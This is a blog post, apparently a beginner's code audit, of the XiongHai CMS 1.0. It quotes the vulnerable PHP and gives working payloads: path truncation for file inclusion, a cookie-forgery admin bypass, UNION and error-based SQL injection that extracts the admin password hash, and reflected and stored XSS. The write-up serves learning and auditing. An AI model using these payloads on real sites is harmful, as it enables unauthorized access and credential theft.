熊海审计

最新推荐文章于 2022-03-07 09:54:42 发布
最新推荐文章于 2022-03-07 09:54:42 发布
阅读量193 收藏
点赞数
分类专栏: 代码审计
DMIND
本文链接:https://blog.csdn.net/weixin_45669205/article/details/115711615
版权

熊海审计

一、文件包含漏洞

0x01:%00截断

截断大概可以在以下情况适用:
include(require)
file_get_contents
file_exists

截断条件:
php版本小于5.3.4 详情关注CVE-2006-7243
php的magic_quotes_gpc为OFF状态

error_reporting(1); //关闭错误显示
$file=addslashes($_GET['r']); //接收文件名
$action=$file==''?'index':$file; //判断为空或者等于index
include('files/'.$action.'.php'); //载入相应文件

%00截断 在这儿不能成功,因为addslashes()进行了预定义字符转义

addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。
预定义字符是:

单引号(')

双引号(")

反斜杠(\)

NULL (%00)

此外,当magic_quotes_gpc开启时也会有预定义字符转义的功能


0x02:问号(?)伪截断

不受限于GPC和PHP版本,只要能返回代码给包含函数就能执行
在HTTP协议中访问http://remotehost/1.txt和访问http://remotehost/1.txt?.php返回结果是一样的,因为WebServer把问号(?)之后的内容当作是请求参数

这里用?不能截断

0x03:文件路径长度截断

系统文件路径长度限制:
windows 259个bytes
linux 4096个bytes

截断条件:
php版本为5.3.4以下(具体哪个版本不是很清楚,乌云上kukki写的5.2.8以下,这明显是不对的,因为我测试用的5.2.9)
不受限于GPC

../都可以截断

../test.txt................................................................................................................................................................................................................................................................................................................................................................................

../test.txt/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././

在这里插入图片描述
在这里插入图片描述

二、cookie欺骗登录后台

在/admin/files/index.php中发现包含了/inc/checklogin.php,然后就发现检验方式是cookie…
在这里插入图片描述

三、SQL注入

在login.php中看看如何处理登录的:

$login=$_POST['login'];
$user=$_POST['user'];
$password=$_POST['password'];
$checkbox=$_POST['checkbox'];

if ($login<>""){
$query = "SELECT * FROM manage WHERE user='$user'";
$result = mysql_query($query) or die('SQL语句有误:'.mysql_error());
$users = mysql_fetch_array($result);

if (!mysql_num_rows($result)) {  
echo "<Script language=JavaScript>alert('抱歉,用户名或者密码错误。');history.back();</Script>";
exit;
}else{
$passwords=$users['password'];
if(md5($password)<>$passwords){
echo "<Script language=JavaScript>alert('抱歉,用户名或者密码错误。');history.back();</Script>";
exit;	
	}

先查用户名信息,然后对比数据库中的passwd是否和我们输入的一致

0x01:UNION注入

没有过滤直接将$user拼接到SQL语句从而造成问题
可以配合union注入,到数据库查看发现有8列数据,passwd在第四列
构造如下:

账号: 1' union select 1,2,3,md5(4),5,6,7,8#
密码: 4



0x02:报错注入
die('SQL语句有误:'.mysql_error());

注意到会拼接返回错误信息,报错注入

1' and extractvalue(1,concat(0x7e,(select username from manage),0x7e))

上述两种方式受限于php.ini 中magic_quotes_gpc 设置(因为我们用到了单引号),如果magic_quotes_gpc=OFF就可利用,ON 则不可利用




0x03:

/files/content.php/files/software.php两处中相同的功能代码,没有过滤,没有用单引号保护。直接可以报错注入

//浏览计数
$query = "UPDATE content SET hit = hit+1 WHERE id=$id"; @mysql_query($query) or die('修改错误:'.mysql_error());

 1 or updatexml(1,concat(0x7e,substr((select group_concat(password) from manage),1,30),0x7e),1)#



三、XSS
0x01:反射型xss

/files/contact.php存在反射型xss

$page=addslashes($_GET['page']);
if ($page<>""){
if ($page<>1){
$pages="第".$page."页 - ";

page=<img src=x onerror=alert(/xss/);>
0x02:存储型xss

在/files/submit.php中将content内容给过滤。

$content=addslashes(strip_tags($content));  //过滤HTML

在评论处可以提交昵称、邮箱、网址、评论内容,但是显示评论和留言的地方有昵称,所以只有昵称处有存储型XSS。

D.MIND
关注
专栏目录
熊海CMS审计(新手入门1)
qq_47094508的博客
06-15 1793
准备环境:phpstudy xhcms源码 seay审计工具 小P记得php版本小于7 先用工具梭一下,为啥要梭一下,因为别人也梭了 工具在末尾 1.文件包含 通过get方式接受r的参数,传递给files,action判断文件名不为空或者等于index,然后通过include函数去包含r传参的文件 例如写了一个phpinfo到files目录下 通过文件包含去调用phpinfo 写到www目录下也可通过../去包含 文件包含不能连shell吗 有知道........
适合入门代码审计熊海cms
HBohan的博客
03-05 1986
一、前言 简单了解了一下,审计入门,熊海比较适合,因为是简单的cms,适合入门。 二、审计环境 使用小皮面板,新建网站 三、审计过程 先了解文件目录 admin --管理后台文件夹 css --存放css的文件夹 files --存放页面的文件夹 images --存放图片的文件夹 inc --存放网站配置文件的文件夹 install --网站进行安装的文件夹 seacmseditor --编辑器文件夹
熊海CMS_1.0 代码审计
weixin_30552811的博客
03-26 1149
  熊海是一款小型的内容管理系统,1.0版本是多年前的版本了,所以漏洞还是比较多的,而且审计起来难度不大,非常适合入门,所以今天我进行这款cms的代码审计。程序安装后使用seay源代码审计系统打开,首先使用自动审计。   可以看到,seay源代码审计工具还是审出了非常多的可疑漏洞的,但是这款工具还是有一定的误报率的。我们需要做的就是可疑漏洞的检查。 0x01 /index.php...
熊海cms代码审计
0xdawn的博客
11-10 2640
0x00 前言 ​ 做这次代码审计的时候,距离看《代码审计:企业级web代码安全架构》一书已经过去了差不多一个月的时间了。借着这次机会,开启自己的代码审计之旅吧! 0x01 seay自动审计 环境搭建 本地留了一份进行源码审计,虚拟机win7下搭建作为攻击利用 本地审计 把cms丢进seay源代码审计系统里,先自动审计一番 发现34个可疑漏洞,接下来要做的就是逐一排查,以防误报 0x02 ...
熊海博客php版本,熊海CMS xhcms v1.0代码审计
weixin_39731922的博客
04-02 475
有空的时候就进行小型CMS的代码审计,这次审计的对象是熊海CMS v1.0本地环境安装好了之后,可以看到提示安装了锁文件说明重装漏洞应该不会存在了,这时候丢进seay代码审计系统的代码也出结果了,挨个看看//单一入口模式error_reporting(0); //关闭错误显示$file=addslashes($_GET[‘r‘]); //接收文件名$action=$file==‘‘?‘index‘...
gitHub资源快速访问方法--jsDeliver
晚来天欲雪
10-09 628
jsDelivr提供npm,GitHub,WordPress等项目的镜像。 对于新手来说,可能翻译来自jsDelivr官方的使用方法感觉很复杂,其实可以简单一点告诉大家怎么用。 比如在我的网站主题中会用到这样的一个CSS文件:style.css 如果我使用本地文件,网站中载入的文件是: https://mywebsite.com/wp-content/themes/mytheme/static/css/style.css 如果我把主题托管到github,那么在我的github中也会有这一个文件: http
熊海cms——代码审计
mingyqf的博客
03-07 3956
前言 再基本了解了代码审计的方法后,看着各个师傅的博客跟着他们一步一步代码审计审计环境 使用小皮面板,新建网站 接着直接打开网站的install 就可以开始安装了 ps:至于为什么不能用php7.4.3 环境 安装请知道的师傅call 我 万分感谢! 审计过程 先了解文件目录 admin --管理后台文件夹 css --存放css的文件夹 files --存放页面的文件夹 images --存放图片的文件夹 inc
熊海cms1.0(代码审计入门学习用)
Npceer-一位网安初学者的博客
09-27 3794
复现复现复现环境搭建这里出了两个问题 第一个第二个开始审计部分1.文件包含2.一个越权/inc/checklogin.php3.sql注入1.admin/login.php2.admin/files/newlink.php3.admin/files/reply.php4.admin/files/software.php5.admin/files/editlink.php 这5个都是一样留言板有xss1.files/contact.php反射XSS2.files/list.php同上 不写了下来翻了很多博客
代码审计熊海cms 首页文件包含漏洞复现
qq_43233085的博客
03-16 1841
代码审计熊海cms 首页文件包含漏洞复现熊海cms代码审计漏洞复现 熊海cms 熊海CMS是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。 适用于个人博客、个人网站、企业网站等各种用途,前台采用电脑、移动端两种显示模式,后台使用HML5响应式布局。 代码审计 先使用Seay工具审计一波,根据关键代码回溯。 工具显示index.php中文件包含函数存在变量,存在...
代码审计熊海cms Cooike欺骗进入后台复现
qq_43233085的博客
03-16 874
代码审计熊海cms Cooike欺骗进入后台复现熊海cms代码审计漏洞复现 熊海cms 熊海CMS是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。 适用于个人博客、个人网站、企业网站等各种用途,前台采用电脑、移动端两种显示模式,后台使用HML5响应式布局。 代码审计 问题出在inc->checklogin.php文件,具体代码如下: <?php $...
$http在上传文件的同时传参数_[代码审计] xhcms 文件包含漏洞分析
weixin_42300099的博客
12-26 523
一、初识CMS:熊海CMS是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。适用于个人博客、个人网站、企业网站等各种用途,前台采用电脑、移动端两种显示模式,后台使用HML5响应式布局。目前系统已经集成:代码高亮、广告模块、文件图片上传、图片水印、图片缩略图,智能头像,互动邮件通知等。部份模块添加多种实用功能-目录结构:二、漏洞简介:程序直接将POST接收到...
struts2 ajax上传文件 file空_文件操作类基础代码审计
weixin_39906499的博客
11-22 195
0x00 文件包含本地包含本地文件包含(Local File Include)简称 LFI,文件包含在php中,一般涉及到的危险函数有 include()、 include_once()、 require()、 require_once(),在包含文件名中存在可控变量的话就可能存在包含漏洞,由于这几个函数的特性也可能产生其他漏洞,后面一一讲到。示例:php $file = $_GE...
CTF——Web——文件包含漏洞
热门推荐
小锤队长的博客
08-19 1万+
转载于 信安之路 :https://cloud.tencent.com/developer/article/1180857 文件包含原理: 原理 文件包含漏洞的产生原因是在通过 PHP 的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 php 中引发文件包含漏洞的通常是以下四个函数: 1、include() 当...
PHP文件包含漏洞
Jim的博客
08-17 1324
PHP的文件包含可以直接执行包含文件的代码,包含的文件格式是不受限制的。 文件包含分为本地文本包含(local file include)和远程文件包含(remote file include) 文件包含函数有:include(),include_once(),require()和require_once() 1.本地文件包含是指只能包含本机文件的包含漏洞,大多出现在模块加载,模板加载和ca
文件包含file_get_contents_截断在文件包含和上传中的利用
weixin_39944146的博客
11-21 1748
截断大概可以在以下情况适用include(require)file_get_contentsfile_exists所有url中参数可以用%00控制0x01. 本地文件包含1.1 截断类型:php %00截断 截断条件:php版本小于5.3.4 详情关注CVE-2006-7243php的magic_quotes_gpc为OFF状态漏洞文件lfi.php<?php$temp = $_REQUES...
ThinkPHP5代码审计【未开启强制路由导致RCE】
D.MIND 的博客
05-13 1864
文章目录简介环境搭建分析payload修复 简介 本次漏洞存在于 ThinkPHP 底层没有对控制器名进行很好的合法性校验,导致在未开启强制路由的情况下,用户可以调用任意类的任意方法,最终导致 远程代码执行漏洞 的产生。漏洞影响版本: 5.0.0<=ThinkPHP5<=5.0.23 、5.1.0<=ThinkPHP<=5.1.30 环境搭建 以5.1.29作为演示: composer create-project --prefer-dist topthink/think=5.1
CTFshow——thinkphp专题
D.MIND 的博客
06-12 1775
570——闭包路由 关注这段代码:这是闭包路由的用法,官方:手册闭包支持 我们用phpinfo()函数测试一下:是可以的 /index.php/ctfshow/phpinfo/1 注意因为eval是一个语言结构而不是函数,所以这里是不能被call_user_func调用的,而assert是一个函数。因此我想到了assert(system("ls"));,但在尝试ls /时却不行了,很迷。 然后我想着参数转移一下。然后下意识构造出这样: /index.php/ctfshow/assert/$_POST[1
CTFshow——代码审计
D.MIND 的博客
04-07 1507
文章目录web301——SQL注入web301——SQL注入web303——报错注入web304——报错注入web305——web306——web307—— web301——SQL注入 将源码下载下来。主要看checklogin.php: $sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; $result=$mysqli->query($sql); $row=
熊海cms1.0 漏洞
最新发布
07-25
- *2* [熊海CMS 1.0代码审计漏洞集合](https://blog.csdn.net/qq_44159028/article/details/120530969)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值